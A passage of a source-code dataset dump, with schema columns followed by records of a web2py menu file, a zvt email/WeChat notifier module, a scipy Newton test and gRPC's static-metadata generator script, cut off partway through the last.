hexsha
stringlengths
40
40
size
int64
4
996k
ext
stringclasses
8 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
245
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
245
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
4
996k
avg_line_length
float64
1.33
58.2k
max_line_length
int64
2
323k
alphanum_fraction
float64
0
0.97
content_no_comment
stringlengths
0
946k
is_comment_constant_removed
bool
2 classes
is_sharp_comment_removed
bool
1 class
f705a8ee33fb9360f9cccd2c289e63ed88006920
6,249
py
Python
applications/welcome/models/menu.py
Gorang-Maniar/DGD
c7b2624c0d0bb0127214ec3804acbe2cc70f8ce0
[ "BSD-3-Clause" ]
8
2018-04-13T14:54:02.000Z
2021-03-04T10:58:09.000Z
webui/applications/grid/models/menu.py
pouyana/teireader
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
[ "MIT" ]
39
2018-03-23T09:25:38.000Z
2022-03-23T15:22:15.000Z
webui/applications/grid/models/menu.py
pouyana/teireader
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
[ "MIT" ]
3
2019-04-09T03:49:21.000Z
2020-03-05T03:51:25.000Z
# -*- coding: utf-8 -*- # this file is released under public domain and you can use without limitations ######################################################################### ## Customize your APP title, subtitle and menus here ######################################################################### response.logo = A(B('web',SPAN(2),'py'),XML('&trade;&nbsp;'), _class="brand",_href="http://www.web2py.com/") response.title = request.application.replace('_',' ').title() response.subtitle = '' ## read more at http://dev.w3.org/html5/markup/meta.name.html response.meta.author = 'Your Name <you@example.com>' response.meta.description = 'a cool new app' response.meta.keywords = 'web2py, python, framework' response.meta.generator = 'Web2py Web Framework' ## your http://google.com/analytics id response.google_analytics_id = None ######################################################################### ## this is the main application menu add/remove items as required ######################################################################### response.menu = [ (T('Home'), False, URL('default', 'index'), []) ] DEVELOPMENT_MENU = True ######################################################################### ## provide shortcuts for development. 
remove in production ######################################################################### def _(): # shortcuts app = request.application ctr = request.controller # useful links to internal and external resources response.menu += [ (SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [ (T('My Sites'), False, URL('admin', 'default', 'site')), (T('This App'), False, URL('admin', 'default', 'design/%s' % app), [ (T('Controller'), False, URL( 'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))), (T('View'), False, URL( 'admin', 'default', 'edit/%s/views/%s' % (app, response.view))), (T('Layout'), False, URL( 'admin', 'default', 'edit/%s/views/layout.html' % app)), (T('Stylesheet'), False, URL( 'admin', 'default', 'edit/%s/static/css/web2py.css' % app)), (T('DB Model'), False, URL( 'admin', 'default', 'edit/%s/models/db.py' % app)), (T('Menu Model'), False, URL( 'admin', 'default', 'edit/%s/models/menu.py' % app)), (T('Database'), False, URL(app, 'appadmin', 'index')), (T('Errors'), False, URL( 'admin', 'default', 'errors/' + app)), (T('About'), False, URL( 'admin', 'default', 'about/' + app)), ]), ('web2py.com', False, 'http://www.web2py.com', [ (T('Download'), False, 'http://www.web2py.com/examples/default/download'), (T('Support'), False, 'http://www.web2py.com/examples/default/support'), (T('Demo'), False, 'http://web2py.com/demo_admin'), (T('Quick Examples'), False, 'http://web2py.com/examples/default/examples'), (T('FAQ'), False, 'http://web2py.com/AlterEgo'), (T('Videos'), False, 'http://www.web2py.com/examples/default/videos/'), (T('Free Applications'), False, 'http://web2py.com/appliances'), (T('Plugins'), False, 'http://web2py.com/plugins'), (T('Layouts'), False, 'http://web2py.com/layouts'), (T('Recipes'), False, 'http://web2pyslices.com/'), (T('Semantic'), False, 'http://web2py.com/semantic'), ]), (T('Documentation'), False, 'http://www.web2py.com/book', [ (T('Preface'), False, 'http://www.web2py.com/book/default/chapter/00'), 
(T('Introduction'), False, 'http://www.web2py.com/book/default/chapter/01'), (T('Python'), False, 'http://www.web2py.com/book/default/chapter/02'), (T('Overview'), False, 'http://www.web2py.com/book/default/chapter/03'), (T('The Core'), False, 'http://www.web2py.com/book/default/chapter/04'), (T('The Views'), False, 'http://www.web2py.com/book/default/chapter/05'), (T('Database'), False, 'http://www.web2py.com/book/default/chapter/06'), (T('Forms and Validators'), False, 'http://www.web2py.com/book/default/chapter/07'), (T('Email and SMS'), False, 'http://www.web2py.com/book/default/chapter/08'), (T('Access Control'), False, 'http://www.web2py.com/book/default/chapter/09'), (T('Services'), False, 'http://www.web2py.com/book/default/chapter/10'), (T('Ajax Recipes'), False, 'http://www.web2py.com/book/default/chapter/11'), (T('Components and Plugins'), False, 'http://www.web2py.com/book/default/chapter/12'), (T('Deployment Recipes'), False, 'http://www.web2py.com/book/default/chapter/13'), (T('Other Recipes'), False, 'http://www.web2py.com/book/default/chapter/14'), (T('Buy this book'), False, 'http://stores.lulu.com/web2py'), ]), (T('Community'), False, None, [ (T('Groups'), False, 'http://www.web2py.com/examples/default/usergroups'), (T('Twitter'), False, 'http://twitter.com/web2py'), (T('Live Chat'), False, 'http://webchat.freenode.net/?channels=web2py'), ]), (T('Plugins'), False, None, [ ('plugin_wiki', False, 'http://web2py.com/examples/default/download'), (T('Other Plugins'), False, 'http://web2py.com/plugins'), (T('Layout Plugins'), False, 'http://web2py.com/layouts'), ]) ] )] if DEVELOPMENT_MENU: _() if "auth" in locals(): auth.wikimenu()
44.319149
79
0.478957
true
true
f705a92454724dc469a9dcc20bbdf310e2ec08ca
6,419
py
Python
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
10
2020-08-08T04:43:00.000Z
2021-07-23T05:38:11.000Z
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
1
2021-08-14T12:19:18.000Z
2021-09-30T06:44:04.000Z
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
1
2021-12-16T01:57:37.000Z
2021-12-16T01:57:37.000Z
# -*- coding: utf-8 -*- import email import json import logging import smtplib from email.header import Header from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from zvt import zvt_config from zvt.networking.request import get_http_session, sync_get, sync_post class Informer(object): logger = logging.getLogger(__name__) def send_message(self, to_user, title, body, **kwargs): pass class EmailInformer(Informer): def __init__(self, ssl=True) -> None: super().__init__() self.ssl = ssl def send_message_(self, to_user, title, body, **kwargs): host = zvt_config['smtp_host'] port = zvt_config['smtp_port'] if self.ssl: try: smtp_client = smtplib.SMTP_SSL(host=host, port=port) except: smtp_client = smtplib.SMTP_SSL() else: try: smtp_client = smtplib.SMTP(host=host, port=port) except: smtp_client = smtplib.SMTP() smtp_client.connect(host=host, port=port) smtp_client.login(zvt_config['email_username'], zvt_config['email_password']) msg = MIMEMultipart('alternative') msg['Subject'] = Header(title).encode() msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username']) if type(to_user) is list: msg['To'] = ", ".join(to_user) else: msg['To'] = to_user msg['Message-id'] = email.utils.make_msgid() msg['Date'] = email.utils.formatdate() plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8') msg.attach(plain_text) try: smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string()) except Exception as e: self.logger.exception('send email failed', e) def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs): if type(to_user) is list and sub_size: size = len(to_user) if size >= sub_size: step_size = int(size / sub_size) if size % sub_size: step_size = step_size + 1 else: step_size = 1 for step in range(step_size): sub_to_user = to_user[sub_size * step:sub_size * (step + 1)] if with_sender: sub_to_user.append(zvt_config['email_username']) self.send_message_(sub_to_user, title, body, 
**kwargs) else: self.send_message_(to_user, title, body, **kwargs) class WechatInformer(Informer): GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format( zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect']) GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}" SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}" token = None def __init__(self, http_session) -> None: self.refresh_token(http_session) def refresh_token(self, http_session): resp = sync_get(http_session, self.GET_TOKEN_URL) self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text)) if resp.status_code == 200 and resp.json() and 'access_token' in resp.json(): self.token = resp.json()['access_token'] else: self.logger.exception("could not refresh_token") def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct): the_json = self._format_price_notification(to_user, security_name, current_price, change_pct) the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8') json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data) if json_result is not None: self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json)) def _format_price_notification(self, to_user, security_name, current_price, change_pct): if change_pct > 0: title = '吃肉喝汤' else: title = '关灯吃面' # 先固定一个template # { # "template_id": "mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U", # "title": "涨跌幅提醒", # "primary_industry": "金融业", # "deputy_industry": "证券|基金|理财|信托", # "content": "{{first.DATA}}\n股票名:{{keyword1.DATA}}\n最新价:{{keyword2.DATA}}\n涨跌幅:{{keyword3.DATA}}\n{{remark.DATA}}", # "example": "您好,腾新控股最新价130.50元,上涨达到设置的3.2%\r\n股票名:腾讯控股(00700)\r\n最新价:130.50元\r\n涨跌幅:+3.2%\r\n点击查看最新实时行情。" # } template_id = 
'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U' the_json = { "touser": to_user, "template_id": template_id, "url": "http://www.foolcage.com", "data": { "first": { "value": title, "color": "#173177" }, "keyword1": { "value": security_name, "color": "#173177" }, "keyword2": { "value": current_price, "color": "#173177" }, "keyword3": { "value": '{:.2%}'.format(change_pct), "color": "#173177" }, "remark": { "value": "会所嫩模 Or 下海干活?", "color": "#173177" } } } return the_json if __name__ == '__main__': email_action = EmailInformer() email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20) http_session = get_http_session() weixin_action = WechatInformer(http_session) weixin_action.send_price_notification(http_session, to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q', security_name='BTC/USDT', current_price=1000, change_pct='0.5%') # the __all__ is generated __all__ = ['Informer', 'EmailInformer', 'WechatInformer']
37.319767
128
0.572986
import email import json import logging import smtplib from email.header import Header from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from zvt import zvt_config from zvt.networking.request import get_http_session, sync_get, sync_post class Informer(object): logger = logging.getLogger(__name__) def send_message(self, to_user, title, body, **kwargs): pass class EmailInformer(Informer): def __init__(self, ssl=True) -> None: super().__init__() self.ssl = ssl def send_message_(self, to_user, title, body, **kwargs): host = zvt_config['smtp_host'] port = zvt_config['smtp_port'] if self.ssl: try: smtp_client = smtplib.SMTP_SSL(host=host, port=port) except: smtp_client = smtplib.SMTP_SSL() else: try: smtp_client = smtplib.SMTP(host=host, port=port) except: smtp_client = smtplib.SMTP() smtp_client.connect(host=host, port=port) smtp_client.login(zvt_config['email_username'], zvt_config['email_password']) msg = MIMEMultipart('alternative') msg['Subject'] = Header(title).encode() msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username']) if type(to_user) is list: msg['To'] = ", ".join(to_user) else: msg['To'] = to_user msg['Message-id'] = email.utils.make_msgid() msg['Date'] = email.utils.formatdate() plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8') msg.attach(plain_text) try: smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string()) except Exception as e: self.logger.exception('send email failed', e) def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs): if type(to_user) is list and sub_size: size = len(to_user) if size >= sub_size: step_size = int(size / sub_size) if size % sub_size: step_size = step_size + 1 else: step_size = 1 for step in range(step_size): sub_to_user = to_user[sub_size * step:sub_size * (step + 1)] if with_sender: sub_to_user.append(zvt_config['email_username']) self.send_message_(sub_to_user, title, body, **kwargs) else: 
self.send_message_(to_user, title, body, **kwargs) class WechatInformer(Informer): GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format( zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect']) GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}" SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}" token = None def __init__(self, http_session) -> None: self.refresh_token(http_session) def refresh_token(self, http_session): resp = sync_get(http_session, self.GET_TOKEN_URL) self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text)) if resp.status_code == 200 and resp.json() and 'access_token' in resp.json(): self.token = resp.json()['access_token'] else: self.logger.exception("could not refresh_token") def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct): the_json = self._format_price_notification(to_user, security_name, current_price, change_pct) the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8') json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data) if json_result is not None: self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json)) def _format_price_notification(self, to_user, security_name, current_price, change_pct): if change_pct > 0: title = '吃肉喝汤' else: title = '关灯吃面' template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U' the_json = { "touser": to_user, "template_id": template_id, "url": "http://www.foolcage.com", "data": { "first": { "value": title, "color": "#173177" }, "keyword1": { "value": security_name, "color": "#173177" }, "keyword2": { "value": current_price, "color": "#173177" }, "keyword3": { "value": '{:.2%}'.format(change_pct), "color": "#173177" }, "remark": { "value": "会所嫩模 Or 下海干活?", "color": "#173177" } } 
} return the_json if __name__ == '__main__': email_action = EmailInformer() email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20) http_session = get_http_session() weixin_action = WechatInformer(http_session) weixin_action.send_price_notification(http_session, to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q', security_name='BTC/USDT', current_price=1000, change_pct='0.5%') __all__ = ['Informer', 'EmailInformer', 'WechatInformer']
true
true
f705a95dd49f7443385a19b9bb52262d3489eae7
277
py
Python
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
import numpy as np from scipy import optimize def f(x, a): return x**3 - a def fder(x, a): return 3 * x**2 rng = np.random.default_rng() x = rng.standard_normal(100) a = np.arange(-50, 50) vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200) print(vec_res)
21.307692
69
0.6787
import numpy as np from scipy import optimize def f(x, a): return x**3 - a def fder(x, a): return 3 * x**2 rng = np.random.default_rng() x = rng.standard_normal(100) a = np.arange(-50, 50) vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200) print(vec_res)
true
true
f705a9bd41c3c5d52a4114e43e885fd40f95eb2b
18,618
py
Python
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
1
2020-02-22T04:55:43.000Z
2020-02-22T04:55:43.000Z
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
null
null
null
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python2.7 # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import hashlib import itertools import collections import os import sys import subprocess import re import perfection # Configuration: a list of either strings or 2-tuples of strings. # A single string represents a static grpc_mdstr. # A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will # also be created). # The list of 2-tuples must begin with the static hpack table elements as # defined by RFC 7541 and be in the same order because of an hpack encoding # performance optimization that relies on this. If you want to change this, then # you must change the implementation of the encoding optimization as well. 
CONFIG = [ # metadata strings 'host', 'grpc-timeout', 'grpc-internal-encoding-request', 'grpc-internal-stream-encoding-request', 'grpc-payload-bin', ':path', 'grpc-encoding', 'grpc-accept-encoding', 'user-agent', ':authority', 'grpc-message', 'grpc-status', 'grpc-server-stats-bin', 'grpc-tags-bin', 'grpc-trace-bin', 'grpc-previous-rpc-attempts', 'grpc-retry-pushback-ms', '1', '2', '3', '4', '', # channel arg keys 'grpc.wait_for_ready', 'grpc.timeout', 'grpc.max_request_message_bytes', 'grpc.max_response_message_bytes', # well known method names '/grpc.lb.v1.LoadBalancer/BalanceLoad', # compression algorithm names 'deflate', 'gzip', 'stream/gzip', # metadata elements # begin hpack static elements (':authority', ''), (':method', 'GET'), (':method', 'POST'), (':path', '/'), (':path', '/index.html'), (':scheme', 'http'), (':scheme', 'https'), (':status', '200'), (':status', '204'), (':status', '206'), (':status', '304'), (':status', '400'), (':status', '404'), (':status', '500'), ('accept-charset', ''), ('accept-encoding', 'gzip, deflate'), ('accept-language', ''), ('accept-ranges', ''), ('accept', ''), ('access-control-allow-origin', ''), ('age', ''), ('allow', ''), ('authorization', ''), ('cache-control', ''), ('content-disposition', ''), ('content-encoding', ''), ('content-language', ''), ('content-length', ''), ('content-location', ''), ('content-range', ''), ('content-type', ''), ('cookie', ''), ('date', ''), ('etag', ''), ('expect', ''), ('expires', ''), ('from', ''), ('host', ''), ('if-match', ''), ('if-modified-since', ''), ('if-none-match', ''), ('if-range', ''), ('if-unmodified-since', ''), ('last-modified', ''), ('link', ''), ('location', ''), ('max-forwards', ''), ('proxy-authenticate', ''), ('proxy-authorization', ''), ('range', ''), ('referer', ''), ('refresh', ''), ('retry-after', ''), ('server', ''), ('set-cookie', ''), ('strict-transport-security', ''), ('transfer-encoding', ''), ('user-agent', ''), ('vary', ''), ('via', ''), ('www-authenticate', ''), 
# end hpack static elements ('grpc-status', '0'), ('grpc-status', '1'), ('grpc-status', '2'), ('grpc-encoding', 'identity'), ('grpc-encoding', 'gzip'), ('grpc-encoding', 'deflate'), ('te', 'trailers'), ('content-type', 'application/grpc'), (':scheme', 'grpc'), (':method', 'PUT'), ('accept-encoding', ''), ('content-encoding', 'identity'), ('content-encoding', 'gzip'), ('lb-token', ''), ('lb-cost-bin', ''), ] # All entries here are ignored when counting non-default initial metadata that # prevents the chttp2 server from sending a Trailers-Only response. METADATA_BATCH_CALLOUTS = [ # (name) (':path'), (':method'), (':status'), (':authority'), (':scheme'), ('te'), ('grpc-message'), ('grpc-status'), ('grpc-payload-bin'), ('grpc-encoding'), ('grpc-accept-encoding'), ('grpc-server-stats-bin'), ('grpc-tags-bin'), ('grpc-trace-bin'), ('content-type'), ('content-encoding'), ('accept-encoding'), ('grpc-internal-encoding-request'), ('grpc-internal-stream-encoding-request'), ('user-agent'), ('host'), ('lb-token'), ('grpc-previous-rpc-attempts'), ('grpc-retry-pushback-ms'), ] COMPRESSION_ALGORITHMS = [ 'identity', 'deflate', 'gzip', ] STREAM_COMPRESSION_ALGORITHMS = [ 'identity', 'gzip', ] # utility: mangle the name of a config def mangle(elem, name=None): xl = { '-': '_', ':': '', '/': 'slash', '.': 'dot', ',': 'comma', ' ': '_', } def m0(x): if not x: return 'empty' r = '' for c in x: put = xl.get(c, c.lower()) if not put: continue last_is_underscore = r[-1] == '_' if r else True if last_is_underscore and put == '_': continue elif len(put) > 1: if not last_is_underscore: r += '_' r += put r += '_' else: r += put if r[-1] == '_': r = r[:-1] return r def n(default, name=name): if name is None: return 'grpc_%s_' % default if name == '': return '' return 'grpc_%s_' % name if isinstance(elem, tuple): return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1])) else: return '%s%s' % (n('mdstr'), m0(elem)) # utility: generate some hash value for a string def fake_hash(elem): return 
hashlib.md5(elem).hexdigest()[0:8] # utility: print a big comment block into a set of files def put_banner(files, banner): for f in files: print >> f, '/*' for line in banner: print >> f, ' * %s' % line print >> f, ' */' print >> f # build a list of all the strings we need all_strs = list() all_elems = list() static_userdata = {} # put metadata batch callouts first, to make the check of if a static metadata # string is a callout trivial for elem in METADATA_BATCH_CALLOUTS: if elem not in all_strs: all_strs.append(elem) for elem in CONFIG: if isinstance(elem, tuple): if elem[0] not in all_strs: all_strs.append(elem[0]) if elem[1] not in all_strs: all_strs.append(elem[1]) if elem not in all_elems: all_elems.append(elem) else: if elem not in all_strs: all_strs.append(elem) compression_elems = [] for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)): val = ','.join(COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('grpc-accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) stream_compression_elems = [] for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)): val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) stream_compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) # output configuration args = sys.argv[1:] H = None C = None D = None if args: if 'header' in args: H = sys.stdout else: H = open('/dev/null', 'w') if 'source' in args: C = sys.stdout else: C = open('/dev/null', 'w') if 'dictionary' in args: D = sys.stdout else: D = open('/dev/null', 'w') else: H = open( os.path.join( os.path.dirname(sys.argv[0]), 
'../../../src/core/lib/transport/static_metadata.h'), 'w') C = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.cc'), 'w') D = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w') # copy-paste copyright notice from this file with open(sys.argv[0]) as my_source: copyright = [] for line in my_source: if line[0] != '#': break for line in my_source: if line[0] == '#': copyright.append(line) break for line in my_source: if line[0] != '#': break copyright.append(line) put_banner([H, C], [line[2:].rstrip() for line in copyright]) hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789'] def esc_dict(line): out = "\"" for c in line: if 32 <= c < 127: if c != ord('"'): out += chr(c) else: out += "\\\"" else: out += '\\x%02X' % c return out + "\"" put_banner([H, C], """WARNING: Auto-generated code. To make changes to this file, change tools/codegen/core/gen_static_metadata.py, and then re-run it. See metadata.h for an explanation of the interface here, and metadata.cc for an explanation of what's going on. 
""".splitlines()) print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H' print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H' print >> H print >> H, '#include <grpc/support/port_platform.h>' print >> H print >> H, '#include "src/core/lib/transport/metadata.h"' print >> H print >> C, '#include <grpc/support/port_platform.h>' print >> C print >> C, '#include "src/core/lib/transport/static_metadata.h"' print >> C print >> C, '#include "src/core/lib/slice/slice_internal.h"' print >> C str_ofs = 0 id2strofs = {} for i, elem in enumerate(all_strs): id2strofs[i] = str_ofs str_ofs += len(elem) def slice_def(i): return ('{&grpc_static_metadata_refcounts[%d],' ' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i])) # validate configuration for elem in METADATA_BATCH_CALLOUTS: assert elem in all_strs print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs) print >> H, ('extern const grpc_slice ' 'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];') for i, elem in enumerate(all_strs): print >> H, '/* "%s" */' % elem print >> H, '#define %s (grpc_static_slice_table[%d])' % ( mangle(elem).upper(), i) print >> H print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join( '%d' % ord(c) for c in ''.join(all_strs))) print >> C print >> C, 'static void static_ref(void *unused) {}' print >> C, 'static void static_unref(void *unused) {}' print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = ' '{static_ref, static_unref, grpc_slice_default_eq_impl, ' 'grpc_slice_default_hash_impl};') print >> H, ('extern const grpc_slice_refcount_vtable ' 'grpc_static_metadata_vtable;') print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = ' '{static_ref, static_unref, grpc_static_slice_eq, ' 'grpc_static_slice_hash};') print >> C, ('static grpc_slice_refcount static_sub_refcnt = ' '{&static_sub_vtable, &static_sub_refcnt};') print >> H, ('extern grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];') 
print >> C, ('grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {') for i, elem in enumerate(all_strs): print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},' print >> C, '};' print >> C print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\' print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == ' '&grpc_static_metadata_vtable)') print >> H print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]' ' = {') for i, elem in enumerate(all_strs): print >> C, slice_def(i) + ',' print >> C, '};' print >> C print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\' print >> H, (' ((int)((static_slice).refcount - ' 'grpc_static_metadata_refcounts))') print >> H print >> D, '# hpack fuzzing dictionary' for i, elem in enumerate(all_strs): print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem])) for i, elem in enumerate(all_elems): print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] + [len(elem[1])] + [ord(c) for c in elem[1]])) print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems) print >> H, ('extern grpc_mdelem_data ' 'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];') print >> H, ('extern uintptr_t ' 'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];') for i, elem in enumerate(all_elems): print >> H, '/* "%s": "%s" */' % elem print >> H, ('#define %s (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[%d], ' 'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i) print >> H print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] ' '= {') print >> C, ' %s' % ','.join( '%d' % static_userdata.get(elem, 0) for elem in all_elems) print >> C, '};' print >> C def str_idx(s): for i, s2 in enumerate(all_strs): if s == s2: return i def md_idx(m): for i, m2 in enumerate(all_elems): if m == m2: return i def offset_trials(mink): yield 0 for i in range(1, 100): for mul in [-1, 1]: yield mul * i def perfect_hash(keys, 
name): p = perfection.hash_parameters(keys) def f(i, p=p): i += p.offset x = i % p.t y = i / p.t return x + p.r[y] return { 'PHASHRANGE': p.t - 1 + max(p.r), 'PHASHNKEYS': len(p.slots), 'pyfunc': f, 'code': """ static const int8_t %(name)s_r[] = {%(r)s}; static uint32_t %(name)s_phash(uint32_t i) { i %(offset_sign)s= %(offset)d; uint32_t x = i %% %(t)d; uint32_t y = i / %(t)d; uint32_t h = x; if (y < GPR_ARRAY_SIZE(%(name)s_r)) { uint32_t delta = (uint32_t)%(name)s_r[y]; h += delta; } return h; } """ % { 'name': name, 'r': ','.join('%d' % (r if r is not None else 0) for r in p.r), 't': p.t, 'offset': abs(p.offset), 'offset_sign': '+' if p.offset > 0 else '-' } } elem_keys = [ str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems ] elem_hash = perfect_hash(elem_keys, 'elems') print >> C, elem_hash['code'] keys = [0] * int(elem_hash['PHASHRANGE']) idxs = [255] * int(elem_hash['PHASHNKEYS']) for i, k in enumerate(elem_keys): h = elem_hash['pyfunc'](k) assert keys[h] == 0 keys[h] = k idxs[h] = i print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join( '%d' % k for k in keys) print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join( '%d' % i for i in idxs) print >> C print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);' print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {' print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;' print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs) print >> C, ' uint32_t h = elems_phash(k);' print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && 